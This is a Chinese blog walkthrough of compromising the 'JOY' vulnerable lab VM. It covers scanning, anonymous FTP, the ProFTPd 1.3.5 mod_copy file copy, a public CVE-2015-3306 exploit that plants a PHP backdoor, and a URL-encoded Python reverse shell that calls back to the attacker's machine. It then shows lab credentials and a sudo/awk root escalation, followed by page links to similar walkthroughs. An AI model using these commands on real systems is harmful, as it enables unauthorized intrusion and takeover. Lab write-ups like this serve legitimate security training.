JOY靶机复现

最新推荐文章于 2024-09-19 05:45:00 发布
最新推荐文章于 2024-09-19 05:45:00 发布
阅读量249 收藏 2
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/141310590
版权

靶机设置

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.150

目录扫描

80端口开放

dirsearch 192.168.112.150

访问浏览器

发现ossec目录

点进去查看发现为ossec框架

ftp登陆

尝试匿名登陆

anonymous

空密码

登陆成功

ls查看

发现有一个directory目录

发现无法进去

下载下来进行查看

从Ftp下载的directory文件中有个version_control文件,但是不知道文件内容,看是否可以用ProFTPd的拷贝漏洞将其内容拿到

site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control
quit

查看version_control文件

发现了ProFTPd的版本是proftpd 1.3.5

getshell

在msf中查找对应漏洞

search proftpd 1.3.5

use 0
show options

查看需要配置的选项

发现无法利用

在github中找到一个漏洞,下载下来

https://github.com/t0kx/exploit-CVE-2015-3306

python exploit.py --host 192.168.112.150 --port 21 --path "/var/www/tryingharderisjoy"

访问浏览器

http://192.168.112.150/backdoor.php?cmd=whoami

发现命令执行成功

进行反弹shell

http://192.168.112.150/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.112.130%22,9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22])%27

kali开启监听

监听成功

提权

生成交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l

发现需要密码

查看文件

patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

发现root用户无法登陆,登陆patrick用户

sudo -l

查看免密操作

echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
put test

将命令写入test,放到ftp的upload目录下

监听test文件

telnet 192.168.112.150 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test
sudo /home/patrick/script/test

提权成功

CcHKer
关注
Tomato靶机复现过程
weixin_67729650的博客
08-04 1109
这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识,去试试。
BlackMarket靶机复现
weixin_52956666的博客
08-07 848
因为squirrelmail是web邮箱应用,存在 CVE-2017-7692 远程代码执行漏洞,但是得有一个用户可以登陆进去。因为 内核版本是4.4.0-31-generic,可以进行脏牛 CVE-2016-5195 提权。并且发现一句话Jason Bourne Email access?抓包,去查看,发现存在id值,这里先尝试改为1,因为大部分高权限用户都是1。尝试squirrelmail,squirrelmail。进入后发现没东西,一点发现有个隐藏的输入框。
liceo靶机复现
m0_72372037的博客
04-30 502
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Liceo本机环境:NAT模式下,使用VirtualBox。
DC-2靶机复现(自己渗透的记录)
hqhhhh的博客
02-20 962
环境搭建参考我的DC-1靶机搭建的方法,靶机的下载同样也在VulnHub中能找到。安装与环境的配置同样跟DC-1完全一直,只需要修改网络连接方式为NAT,使其与你的攻击机处于同一局域网内即可。
IMF靶机复现
weixin_43999483的博客
02-23 434
IMF靶机复现 发现靶机IP:192.168.8.198 搜寻开放端口,发现除了80端口外,没发现其他端口。 使用dirb 撞靶机的子域名 dirb http://192.168.8.198 并没有找到有用的域名 F12手动查找Flag 在contact.php中找到注释的Flag1 搜寻== 发现后三行乱码 疑似Flag,组合base64解码得到 对flag2的内容进行再解码,得到 : 可能是用户名密码或者是子域名,猜测得到网址192.168.8.198/imfadministrator
sunset靶机复现
weixin_52956666的博客
08-19 243
靶机IP为192.168.112.148。ls发现有一个backup文件,进行下载。将backup里的内容放到1.txt中。sudo -l查看免密操作。发现用户:sunset。靶机设置为NAT模式。在kali中进行破解。密码:cheer14。
Fristileaks靶机复现
日常打一些漏洞靶机
09-19 288
上传一句话木马
DC-1靶机复现
weixin_43980115的博客
03-21 1551
下载安装DC-1,并启动DC-1 下载地址:https://www.five86.com/downloads/DC-1.zip 下载完解压后会有一个以.ova为后缀的文件,直接在VM种用”打开虚拟机”,在设置中修改网络适配器为NET模式。 在这里记一下DC-1的MAC地址,等下用的到。 启动DC-1时开机就好,不用输用户名和密码登录(你也不知道呀) 打开kali,查看kali的IP地址和子网掩码 因为DC-1和kali现在属于同一个网段,查看kali的IP和子网掩码是为了获得DC-1的网络号
BlackMarket靶机复现【附代码】(权限提升)
weixin_52487093的博客
08-09 2770
web打洞值得挑战!!!全网最详细的BLACKMARKET打靶过程!【少绕弯路!!!】
Broken: Gallery靶机复现
weixin_52956666的博客
08-13 362
靶机IP为192.168.112.142。sudo -l查看免密操作。尝试爆破ssh账号密码。靶机设置为NAT模式。查看后发现都没什么用。
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8494
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于SpringBoot+Vue+MyBatis实现的音乐网站源码+数据库+文档说明-毕业设计.zip
10-10
基于SpringBoot+Vue+MyBatis实现的音乐网站源码+数据库+文档说明-毕业设计.zip,本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。 基于SpringBoot+Vue+MyBatis实现的音乐网站源码+数据库+文档说明-毕业设计.zip,本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。 基于SpringBoot+Vue+MyBatis实现的音乐网站源码+数据库+文档说明-毕业设计.zip,本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。基于SpringBoot+Vue+MyBatis实现的音乐网站源码+数据库+文档说明。
卡车无人机路径优化,卡车带无人机路径优化 车辆无人机路径优化 代码具有可复制性
10-10
卡车无人机路径优化,卡车带无人机路径优化。 车辆无人机路径优化。 代码具有可复制性
【风电预测】基于matlab支持向量机SVM-Adaboost风电场预测【含Matlab源码 期】.zip
最新发布
10-10
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
SpringBoot+Vue高校奖助学金系统答辩PPT.ppt
10-10
计算机毕业设计答辩PPT
Nodejs+Vue物业管理系统答辩PPT.pptx
10-10
计算机毕业设计答辩PPT
Kioptrix2靶场复现:SQL注入到权限提升详解
"Kioptrix2-WalkThrough 靶机复现文档详细记录了在Kali Linux环境下对Kioptrix Level 1-1.2靶机的渗透测试过程,包括信息收集、漏洞利用和权限提升等关键步骤。靶机主要开放了MySQL、SSH和HTTP服务,通过SQL注入攻破...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值